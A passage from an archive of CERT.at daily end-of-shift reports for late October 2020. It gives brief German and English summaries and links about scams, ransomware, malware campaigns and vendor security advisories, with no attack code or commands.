cybersecurity community is coming together to combat this rash of attacks, combining resources to provide network defenders with alerts and intelligence to protect our healthcare institutions. --------------------------------------------- https://www.riskiq.com/blog/external-threat-management/ryuk-ransoware-indic… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (cimg, junit4, kernel, openldap, qtsvg-opensource-src, spice, spice-gtk, tzdata, and wireshark), Fedora (firefox, java-1.8.0-openjdk, java-11-openjdk, and thunderbird), openSUSE (apache2, binutils, libvirt, lout, pacemaker, pagure, phpMyAdmin, samba, sane-backends, singularity, spice, spice-gtk, thunderbird, nspr, tomcat, virt-bootstrap, and xen), SUSE (graphviz, liblouis, and samba), and Ubuntu (samba). --------------------------------------------- https://lwn.net/Articles/835838/ ∗∗∗ Oracle Security Alert for CVE-2020-14750 - 01 November 2020 ∗∗∗ --------------------------------------------- https://www.oracle.com/security-alerts/alert-cve-2020-14750.html ∗∗∗ Hormann BiSecur Gateway and Home Server multiple vulnerabilities ∗∗∗ --------------------------------------------- https://sec-consult.com/./en/blog/advisories/hormann-bisecur-gateway-and-ho… ∗∗∗ WordPress: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1058 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 30.10.2020
by Daily end-of-shift report 30 Oct '20

30 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 29-10-2020 18:00 − Freitag 30-10-2020 18:00 Handler: Stephan Richter Co-Handler: n/a ===================== = News = ===================== ∗∗∗ „2. Lockdown! Krise! Was jetzt?“ – SMS bewirbt betrügerische Investment-Plattform ∗∗∗ --------------------------------------------- Eine Verschärfung der Corona-Maßnahmen bedeutet für viele Menschen weniger Einkommen. Das wissen auch BetrügerInnen. Sie nutzen diese Notsituation bewusst aus. So kursiert derzeit eine betrügerische SMS, in der eine scheinbar einfache Lösung angeboten wird: Das Investieren in Bitcoins – allerdings auf einer unseriösen Plattform. Die Schadenssummen, die dabei entstehen, reichen von 200 Euro bis weit über 100.000 Euro. Löschen Sie daher die SMS! --------------------------------------------- https://www.watchlist-internet.at/news/2-lockdown-krise-was-jetzt-sms-bewir… ∗∗∗ [SANS ISC] Quick Status of the CAA DNS Record Adoption ∗∗∗ --------------------------------------------- I published the following diary on isc.sans.edu: “Quick Status of the CAA DNS Record Adoption“: In 2017, we already published a guest diary about “CAA” or “Certification Authority Authorization”. I was curious about the status of this technique and the adoption level in 2020. Has it been adopted massively sinceThe post [SANS ISC] Quick Status of the CAA DNS Record Adoption appeared first on /dev/random. --------------------------------------------- https://blog.rootshell.be/2020/10/30/sans-isc-quick-status-of-the-caa-dns-r… ∗∗∗ BEC Attacks Targeting Energy and Infrastructure Rise by 93% ∗∗∗ --------------------------------------------- Business email compromise attacks (BEC) have continued to grow in Q3 of 2020, rising by 15% overall compared to Q2, according to Abnormal Security’s Quarterly BEC Report. The average weekly volume of BEC attacks increased quarter-by-quarter in six out of eight industries, with the biggest rise observed in the energy/infrastructure sector, at 93%. --------------------------------------------- https://www.infosecurity-magazine.com/news/bec-attacks-energy-infrastructur… ∗∗∗ Pktvisor: Open source tool for network visibility ∗∗∗ --------------------------------------------- NS1 announced that pktvisor, a lightweight, open source tool for real-time network visibility, is available on GitHub. The importance of applications and digital services has skyrocketed in 2020. Connectivity and resilience are imperative to keeping people connected and business moving forward. Visibility into network traffic, especially in distributed edge environments and with malicious attacks on the rise, is a critical part of ensuring uptime and performance. --------------------------------------------- https://www.helpnetsecurity.com/2020/10/30/pktvisor-open-source-tool/ ∗∗∗ Oh ... Ransomware hat auch meine Backups verschlüsselt ... Was nun? ∗∗∗ --------------------------------------------- Das Thema Ransomware verfolgt Unternehmen weltweit nun schon ein bis zwei Jahrzehnte [1]. Es ist auch kein Trend zu erkennen, dass sich das bald ändern sollte. Es muss leider vom Gegenteil ausgegangen werden. Die Anzahl an Vorfällen ist besonders in den letzten Jahren gestiegen [2]. Angreifer setzten inzwischen nicht nur auf Verschlüsselung, sondern drohen mit der Veröffentlichung von Unternehmensdaten, welche vor dem Unbrauchbarmachen exfiltriert wurden, um die [...] --------------------------------------------- https://cert.at/de/blog/2020/10/oh-ransomware-hat-auch-meine-backups-versch… ===================== = Vulnerabilities = ===================== ∗∗∗ Attacks exploiting Netlogon vulnerability (CVE-2020-1472) ∗∗∗ --------------------------------------------- Microsoft has received a small number of reports from customers and others about continued activity exploiting a vulnerability affecting the Netlogon protocol (CVE-2020-1472) which was previously addressed in security updates starting on August 11, 2020. If the original guidance is not applied, the vulnerability could allow an attacker to spoof a domain controller account that could be [...] --------------------------------------------- https://msrc-blog.microsoft.com:443/2020/10/29/attacks-exploiting-netlogon-… ∗∗∗ Sicherheitslücken: Nvidia veröffentlicht BMC-Firmware-Updates für DGX-Server ∗∗∗ --------------------------------------------- Aus der AMI BMC-Firmware für Nvidias Deep-Learning-Server DGX-1, DGX-2 und DGX A100 wurden neun Sicherheitslücken entfernt, von denen eine als kritisch gilt. --------------------------------------------- https://heise.de/-4943948 ∗∗∗ Vulnerability Spotlight: Multiple vulnerabilities in Synology SRM (Synology Router Manager) ∗∗∗ --------------------------------------------- Cisco Talos recently discovered multiple remote vulnerabilities in software that helps power Synology routers. The bugs exist in Synology Router Manager (SRM) - a Linux-based operating system for Synology routers - and QuickConnect, a feature inside SRM that allows users to remotely connect to their routers. An adversary could use these vulnerabilities to carry out a range of [...] --------------------------------------------- https://blog.talosintelligence.com/2020/10/vulnerability-spotlight-multiple… ∗∗∗ October 29, 2020 TNS-2020-07 [R1] Nessus Agent 8.2.0 Fixes One Vulnerability ∗∗∗ --------------------------------------------- http://www.tenable.com/security/tns-2020-07 ∗∗∗ October 29, 2020 TNS-2020-08 [R1] Nessus 8.12.1 Fixes One Vulnerability ∗∗∗ --------------------------------------------- http://www.tenable.com/security/tns-2020-08 ∗∗∗ Wireshark: Mehrere Schwachstellen ermöglichen Denial of Service ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1054 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.10.2020
by Daily end-of-shift report 29 Oct '20

29 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 28-10-2020 18:00 − Donnerstag 29-10-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Upcoming Security Updates for Adobe Acrobat and Reader (APSB20-67) ∗∗∗ --------------------------------------------- A prenotification security advisory (APSB20-67) has been posted regarding upcoming Adobe Acrobat and Reader updates scheduled for Tuesday, November 03, 2020. We will continue to provide updates on the upcoming release via the Security Bulletins and Advisories page as well as the Adobe PSIRT Blog. This posting is provided “AS IS” with no warranties and [...] --------------------------------------------- https://blogs.adobe.com/psirt/?p=1936 ∗∗∗ CPU: ME-Hacker knacken Intel-Microcode-Updates ∗∗∗ --------------------------------------------- Sicherheitsforscher können die Microcode-Updates für Intel-CPUs entschlüsseln und untersuchen. Eine Übernahme ist damit noch nicht möglich. --------------------------------------------- https://www.golem.de/news/cpu-me-hacker-knacken-intel-microcode-updates-201… ∗∗∗ 5 Places Where You’d Never Expect to Get Hacked ∗∗∗ --------------------------------------------- For every gleaming new IoT device that hits the market, a hacker somewhere is figuring out how to compromise it. Today, even routine activities can land you in the sights of a bad actor. --------------------------------------------- https://blog.sucuri.net/2020/10/5-places-where-youd-never-expect-to-get-hac… ∗∗∗ Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser ∗∗∗ --------------------------------------------- Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat. --------------------------------------------- http://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-w… ∗∗∗ Jetzt patchen! Angreifer scannen nach verwundbaren Oracle-WebLogic-Servern ∗∗∗ --------------------------------------------- Admins sollten ihre WebLogic-Server aus Sicherheitsgründen auf den aktuellen Stand bringen. --------------------------------------------- https://heise.de/-4942360 ∗∗∗ Erpressungstrojaner: Maze hört wohl auf, REvil macht 100 Millionen US-Dollar ∗∗∗ --------------------------------------------- Ransomware ist nach wie vor der Star der Malware-Szene. Die Drahtzieher bauen ihr "Geschäftsmodell" stetig aus und ernten damit Umsätze in Millionenhöhe. --------------------------------------------- https://heise.de/-4942549 ∗∗∗ ESET Threat Report für das 3. Quartal 2020 ∗∗∗ --------------------------------------------- Die Bedrohungslage im zweiten Quartal 2020 aus Sicht der ESET-Telemetrie und der ESET-Sicherheitsforscher. --------------------------------------------- https://www.welivesecurity.com/deutsch/2020/10/28/eset-threat-report-fuer-d… ∗∗∗ Domain Parking: A Gateway to Attackers Spreading Emotet and Impersonating McAfee ∗∗∗ --------------------------------------------- Domain parking might appear harmless at first glance, but parked domains can redirect visitors to unwanted landing pages or turn entirely malicious. --------------------------------------------- https://unit42.paloaltonetworks.com/domain-parking/ ===================== = Vulnerabilities = ===================== ∗∗∗ Code vulnerabilities put health records at risk ∗∗∗ --------------------------------------------- OpenEMR is the most popular open source software for electronic health record and medical practice management. It is used world-wide to manage sensitive patient data, including information about medications, laboratory values, and diseases. [...] During our security research of popular web applications, we discovered several code vulnerabilities in OpenEMR 5.0.2.1. A combination of these vulnerabilities allowed remote attackers to execute arbitrary system commands on any OpenEMR server that [...] --------------------------------------------- https://blog.sonarsource.com/openemr-5-0-2-1-command-injection-vulnerability ∗∗∗ Samba: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Samba ausnutzen, um Informationen offenzulegen oder einen Denial of Service zu verursachen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1051 ∗∗∗ F5 BIG-IP: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in F5 BIG-IP ausnutzen, um einen Denial of Service Angriff durchzuführen, Informationen offenzulegen oder einen Cross Site Scripting Angriff durchzuführen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1052 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (linux-4.19), Fedora (tcpreplay, xen, and yubihsm-shell), SUSE (pacemaker), and Ubuntu (gosa and pam-python). --------------------------------------------- https://lwn.net/Articles/835552/ ∗∗∗ Security Bulletin: IBM Security Directory Suite is affected by security vulnerability(CVE-2018-4441) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-directory-su… ∗∗∗ Security Bulletin: Multiple security vulnerabilities have been identified in IBM® Java SDK that affect IBM Security Directory Suite – October 2019 CPU ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera… ∗∗∗ Security Bulletin: IBM i2 Analyst's Notebook Memory Corruption Vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-i2-analysts-notebook-… ∗∗∗ Security Bulletin: IBM Resilient OnPrem could allow an attacker on a restricted internal network to provide the server with a spoofed source IP address. (CVE-2020-4864) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-resilient-onprem-coul… ∗∗∗ Security Bulletin: Embedded WebSphere Application Server is vulnerable to an information disclosure vulnerability affects Content Collector for Email ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-embedded-websphere-applic… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Pak for Data – Golang (CVE-2020-16845) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: Embedded WebSphere Application Server is vulnerable to an information disclosure vulnerability affects Content Collector for Email ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-embedded-websphere-applic… ∗∗∗ Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-struts-publicly-di… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.10.2020
by Daily end-of-shift report 28 Oct '20

28 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 27-10-2020 18:00 − Mittwoch 28-10-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ So schützen Sie sich im Webbrowser vor Phishing-Attacken ∗∗∗ --------------------------------------------- Derzeit werden der Watchlist Internet sehr viele Phishing-Versuche gemeldet. Die BetrügerInnen werden dabei immer raffinierter. Damit Sie sich besser vor den betrügerischen Phishing-Seiten schützen können, zeigen wir Ihnen Schritt für Schritt wie Sie Phishing-Warnungen in Google Chrome und Firefox einschalten können. --------------------------------------------- https://www.watchlist-internet.at/news/so-schuetzen-sie-sich-im-webbrowser-… ∗∗∗ LokiBot Malware: What it is and how to respond to it ∗∗∗ --------------------------------------------- The Cybersecurity and Infrastructure Agency (CISA) of the U.S. Department of Homeland Security recently announced that activity in LokiBot, a form of aggressive malware, has increased dramatically over the last two months. The activity increase was discovered by an automated intrusion detection system referred to as EINSTEIN, which the Department of Homeland Security uses for collecting and analyzing security information across numerous [...] --------------------------------------------- https://cybersecurity.att.com/blogs/security-essentials/lokibot-malware-wha… ∗∗∗ Microsoft Defender ATP scars admins with false Cobalt Strike alerts ∗∗∗ --------------------------------------------- Administrators woke up to a scary surprise today after false positives in Microsoft Defender ATP showed network devices infected with Cobalt Strike. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-atp-scar… ∗∗∗ Facebook "copyright violation" tries to get past 2FA - don’t fall for it! ∗∗∗ --------------------------------------------- Watch out for "Facebook copyright violation" emails - even if they link straight back to Facebook.com --------------------------------------------- https://nakedsecurity.sophos.com/2020/10/27/facebook-copyright-violation-tr… ∗∗∗ SMBGhost - the critical vulnerability many seem to have forgotten to patch, (Wed, Oct 28th) ∗∗∗ --------------------------------------------- You probably remember that back in March, Microsoft released a patch for a vulnerability in SMBv3 dubbed SMBGhost (CVE-2020-0796), since at that time, it received as much media attention as was reasonable for a critical (CVSS 10.0) vulnerability in Windows, which might lead to remote code execution[1]. --------------------------------------------- https://isc.sans.edu/diary/rss/26732 ∗∗∗ Hörmann - Tag der offenen Tür für alle... ∗∗∗ --------------------------------------------- Die Erkennung potenzieller Schwachstellen durch SEC Consult erwies sich als hilfreich, um das gesamte BiSecur-System zu verbessern. --------------------------------------------- https://www.sec-consult.com/./blog/2020/10/hoermann-tag-der-offenen-tuer-fu… ∗∗∗ TrickBot Linux Variants Active in the Wild Despite Recent Takedown ∗∗∗ --------------------------------------------- Efforts to disrupt TrickBot may have shut down most of its critical infrastructure, but the operators behind the notorious malware arent sitting idle. According to new findings shared by cybersecurity firm Netscout, TrickBots authors have moved portions of their code to Linux in an attempt to widen the scope of victims that could be targeted. --------------------------------------------- https://thehackernews.com/2020/10/trickbot-linux-variants-active-in-wild.ht… ∗∗∗ Welcome to ThreatPursuit VM: A Threat Intelligence and Hunting Virtual Machine ∗∗∗ --------------------------------------------- Skilled adversaries can deceive detection and often employ new measures in their tradecraft. Keeping a stringent focus on the lifecycle and evolution of adversaries allows analysts to devise new detection mechanisms and response processes. Access to the appropriate tooling and resources is critical to discover these threats within a timely and accurate manner. Therefore, we are actively compiling the most essential software packages into a Windows-based distribution: ThreatPursuit VM. --------------------------------------------- http://www.fireeye.com/blog/threat-research/2020/10/threatpursuit-vm-threat… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (blueman), Fedora (nodejs), Gentoo (firefox), openSUSE (kleopatra), Oracle (java-1.8.0-openjdk), SUSE (apache2, binutils, firefox, pacemaker, sane-backends, spice, spice-gtk, tomcat, virt-bootstrap, xen, and zeromq), and Ubuntu (ca-certificates, mariadb-10.1, mariadb-10.3, netty, openjdk-8, openjdk-lts, perl, and tomcat6). --------------------------------------------- https://lwn.net/Articles/835497/ ∗∗∗ Sicherheitsupdate: Angreifer könnten eigene Befehle auf Qnap NAS ausführen ∗∗∗ --------------------------------------------- Netzwerkspeicher von Qnap sind über zwei Lücken attackierbar. Ein Patch schafft Abhilfe. --------------------------------------------- https://heise.de/-4941315 ∗∗∗ MediaWiki: Schwachstelle ermöglicht Cross-Site Scripting ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1048 ∗∗∗ Red Hat OpenShift: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1049 ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Tivoli System Automation for Multiplatforms Jul 2020 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Vulnerability in IBM Java SDK affect IBM Tivoli System Automation Application Manager Jul 2020 (CVE-2020-2590) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ibm-java… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect ITCAM for SOA (July 2020) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: A security vulnerability in Node.js serialize-javascript affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: Security vulnerability in Java SE affects Rational Build Forge (CVE-2020-2601) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerability-in… ∗∗∗ Security Bulletin: Vulnerability in Network Time Protocol (NTP) affects IBM Virtualization Engine TS7700 (CVE-2020-11868) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-network-… ∗∗∗ Security Bulletin: Security vulnerabilities in Java SE affects Rational Build Forge ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-… ∗∗∗ Security Bulletin: A security vulnerability in Node.js jison affects IBM Cloud Pak for Multicloud Management Managed Service. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-security-vulnerability-… ∗∗∗ Security Bulletin: IBM WebSphere Cast Iron Solution & App Connect Professional is affected by Apache Tomcat vulnerabilities. ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-websphere-cast-iron-s… ∗∗∗ Security Bulletin: A Remote Vulnerability Affects IBM Sterling Connect:Direct for Microsoft Windows (CVE-2020-4767) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-remote-vulnerability-af… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 27.10.2020
by Daily end-of-shift report 27 Oct '20

27 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 23-10-2020 18:00 − Dienstag 27-10-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Vorsicht: Betrügerisches FinanzOnline-E-Mail im Umlauf ∗∗∗ --------------------------------------------- Aktuell sind gefälschte E-Mails im Namen des Finanzamtes unterwegs. In der E-Mail werden Sie über Ihre Steuerrückerstattung informiert und aufgefordert, die Transaktion zu genehmigen. Klicken Sie aber keinesfalls auf den Link, Sie landen auf einer gefälschten FinanzOnline-Website, die es Kriminellen ermöglicht, persönliche Daten sowie Kreditkartendaten abzugreifen! --------------------------------------------- https://www.watchlist-internet.at/news/vorsicht-betruegerisches-finanzonlin… ∗∗∗ Industrieanlagen mit OPC UA systematisch schlecht konfiguriert ∗∗∗ --------------------------------------------- Forscher des Fraunhofer FKIE und der RWTH Aachen haben das Internet nach Steuerungen auf Basis des Standards OPC UA durchsucht. 92% waren unsicher eingerichtet. --------------------------------------------- https://heise.de/-4939199 ∗∗∗ Sicherheitsupdate: Angreifer attackieren Microsofts Webbrowser Edge ∗∗∗ --------------------------------------------- Die Entwickler von Microsoft haben im Webbrowser Edge mehrere Sicherheitslücken geschlossen. --------------------------------------------- https://heise.de/-4940091 ∗∗∗ Malware Emotet versteckt sich hinter gefälschtem Upgrade für Microsoft Word ∗∗∗ --------------------------------------------- Eine neue Kampagne gaukelt Opfern vor, sie benötigen ein Upgrade mit neuen Funktionen für Microsoft Word. Tatsächlich sollen sie die Sicherheitsvorkehrungen zum Schutz vor gefährlichen Makros deaktivieren. Die schädlichen Dokumente verteilen die Hintermänner weiterhin per E-Mail. --------------------------------------------- https://www.zdnet.de/88389137/malware-emotet-versteckt-sich-hinter-gefaelsc… ∗∗∗ KashmirBlack: Botnet attackiert WordPress, Joomla und Drupal ∗∗∗ --------------------------------------------- Die Hintermänner nutzen bekannte Schwachstellen in CMS-Plattformen und Plug-ins. Darüber schleusen sie einen Cryptominer ein. Laut Imperva verfügt das Botnet inzwischen über eine "massive Infrastruktur". --------------------------------------------- https://www.zdnet.de/88389169/kashmirblack-botnet-attackiert-wordpress-joom… ∗∗∗ New RAT malware gets commands via Discord, has ransomware feature ∗∗∗ --------------------------------------------- The new Abaddon remote access trojan may be the first to use Discord as a full-fledged command and control server that instructs the malware on what tasks to perform on an infected PC. Even worse, a ransomware feature is being developed for the malware. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-command… ∗∗∗ Massive Nitro data breach impacts Microsoft, Google, Apple, more ∗∗∗ --------------------------------------------- A massive data breach suffered by the Nitro PDF service impacts many well-known organizations, including Google, Apple, Microsoft, Chase, and Citibank. --------------------------------------------- https://www.bleepingcomputer.com/news/security/massive-nitro-data-breach-im… ∗∗∗ Study of the ShadowPad APT backdoor and its relation to PlugX ∗∗∗ --------------------------------------------- In July 2020, we released a study of targeted attacks on state institutions in Kazakhstan and Kyrgyzstan with a detailed analysis of malware found in compromised networks. During the investigation, Doctor Web specialists analyzed and described several groups of trojan programs, including new samples of trojan families already encountered by our virus analysts, as well as previously unknown trojans. --------------------------------------------- https://news.drweb.com/show/?i=14048&lng=en&c=9 ∗∗∗ Majority of Microsoft 365 Admins Don’t Enable MFA ∗∗∗ --------------------------------------------- Beyond admins, researchers say that 97 percent of all total Microsoft 365 users do not use multi-factor authentication. --------------------------------------------- https://threatpost.com/microsoft-365-admins-mfa/160592/ ∗∗∗ LinkedIn, Instagram Vulnerable to Preview-Link RCE Security Woes ∗∗∗ --------------------------------------------- Popular chat apps, including LINE, Slack, Twitter DMs and others, can also leak location data and share private info with third-party servers. --------------------------------------------- https://threatpost.com/linkedin-instagram-preview-link-rce-security/160600/ ∗∗∗ Excel 4 Macros: "Abnormal Sheet Visibility", (Mon, Oct 26th) ∗∗∗ --------------------------------------------- Excel 4 macros are composed of formulas (commands) and values stored inside a sheet. --------------------------------------------- https://isc.sans.edu/diary/rss/26726 ∗∗∗ Password Security & Password Managers ∗∗∗ --------------------------------------------- In the spirit of National Cyber Security Awareness Month (NCSAM), let’s talk about a security basic that many people overlook: passwords. These are one of the most fundamental aspects of website security, yet we too often see webmasters taking a lax approach to secure passwords. In fact, the online security provider TeamPassword found that last year the most commonly leaked password was 123456. That edges out some real gems including qwerty and the always-popular password. --------------------------------------------- https://blog.sucuri.net/2020/10/password-security-password-managers.html ∗∗∗ P.A.S. Fork v. 1.0 — A Web Shell Revival ∗∗∗ --------------------------------------------- A PHP shell containing multiple functions can easily consist of thousands of lines of code, so it’s no surprise that attackers often reuse the code from some of the most popular PHP web shells, like WSO or b374k. After all, if these popular (and readily available) PHP web shells do the job, there’s no need to code an entirely new tool. --------------------------------------------- https://blog.sucuri.net/2020/10/p-a-s-fork-v-1-0-a-web-shell-revival.html ===================== = Vulnerabilities = ===================== ∗∗∗ VU#760767: Macrium Reflect is vulnerable to privilege escalation due to OPENSSLDIR location ∗∗∗ --------------------------------------------- Overview Macrium Reflect contains a privilege escalation vulnerability due to the use of an OPENSSLDIR variable that specifies a location where an unprivileged Windows user can create files. Description CVE-2020-10143 Macrium Reflect includes an OpenSSL component that specifies an OPENSSLDIR variable as C:\openssl\. Macrium Reflect contains a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create [...] --------------------------------------------- https://kb.cert.org/vuls/id/760767 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (thunderbird), Fedora (createrepo_c, dnf-plugins-core, dnf-plugins-extras, librepo, livecd-tools, and pdns-recursor), openSUSE (firefox and mailman), Oracle (firefox), Red Hat (chromium-browser, java-1.8.0-openjdk, and Satellite 6.8), Scientific Linux (java-1.8.0-openjdk), SUSE (libvirt), and Ubuntu (blueman, firefox, mysql-5.7, mysql-8.0, php7.4, and ruby-kramdown). --------------------------------------------- https://lwn.net/Articles/835401 ∗∗∗ HPE/Aruba: Kritische Lücken in SSMC, AirWave Glass und weiteren Produkten ∗∗∗ --------------------------------------------- Jetzt updaten: Unter anderem kann eine Lücke mit Höchstwertung in der StoreServ Management Console Angreifern unbefugte Remote-Zugriffe leicht machen. --------------------------------------------- https://heise.de/-4938532 ∗∗∗ NVIDIA Patches Code Execution Flaws in GeForce Experience ∗∗∗ --------------------------------------------- Patches released by NVIDIA last week for the GeForce Experience software address two arbitrary code execution bugs assessed with a severity rating of high. --------------------------------------------- https://www.securityweek.com/nvidia-patches-code-execution-flaws-geforce-ex… ∗∗∗ Trend Micro AntiVirus for Mac: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1047 ∗∗∗ Red Hat OpenShift: Schwachstelle ermöglicht Denial of Service ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1045 ∗∗∗ Security Bulletin: IBM API Connect's Developer Portal is vulnerable to social engineering attacks (CVE-2020-4337) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connects-develope… ∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Platform Symphony and IBM Spectrum Symphony ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Vulnerabilities in Curl affect PowerSC (CVE-2020-8169, CVE-2020-8177) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-curl-a… ∗∗∗ Security Bulletin: Vulnerabilities in NTPv4 affect AIX (CVE-2020-11868, CVE-2020-13817, and CVE-2020-15025) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ntpv4-… ∗∗∗ Security Bulletin: CVE-2020-15190 for Tensorflow in Watson Machine Learning Community Edition ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-15190-for-tensor… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.10.2020
by Daily end-of-shift report 23 Oct '20

23 Oct '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 22-10-2020 18:00 − Freitag 23-10-2020 18:00 Handler: Dimitri Robl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ R_Evil WordPress Hacktool & Malicious JavaScript Injections ∗∗∗ --------------------------------------------- We often see hackers reusing the same malware, with only a few new adjustments to obfuscate the code so that it is more difficult for scanning tools to detect. However, sometimes entirely new attack tools are created and deployed by threat actors who don’t want to rely on obfuscating existing malware. --------------------------------------------- https://blog.sucuri.net/2020/10/r_evil-wordpress-hacktool-malicious-javascr… ∗∗∗ Zahlreiche neue Fake-Shops locken mit günstigen Angeboten und gutem Kundendienst ∗∗∗ --------------------------------------------- Derzeit melden uns LeserInnen der Watchlist Internet zahlreiche neu registrierte Fake-Shops, die alle ähnlich aufgebaut sind und die gleichen Texte verwenden. Versprochen werden hochwertige Produkte, ein starkes Kundendienstteam und einfache Rückgabemöglichkeiten. Doch tatsächlich stecken hinter diesen vermeintlichen Online-Shops, Kriminelle. --------------------------------------------- https://www.watchlist-internet.at/news/zahlreiche-neue-fake-shops-locken-mi… ∗∗∗ Securing medical devices: Can a hacker break your heart? ∗∗∗ --------------------------------------------- Why are connected medical devices vulnerable to attack and how likely are they to get hacked? Here are five digital chinks in the armor. --------------------------------------------- https://www.welivesecurity.com/2020/10/23/securing-medical-devices-hack-hea… ∗∗∗ Practical example of fuzzing OPC UA applications ∗∗∗ 